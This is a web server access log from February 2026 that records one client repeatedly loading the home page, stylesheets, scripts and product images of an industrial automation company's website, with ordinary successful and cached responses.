-[17/Feb/2026:03:20:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:20:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:20:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:20:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:20:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:20:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10405] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:03:20:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:20:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:20:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:20:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:20:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:20:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:20:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20927] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:20:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:20:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:20:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:20:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:20:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:20:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:35:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10403] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:03:35:17 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:35:17 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:35:17 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:35:17 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:35:17 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:35:17 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10418] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20927] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:44:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10418] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20927] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10418] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20927] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:47:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10418] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20927] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 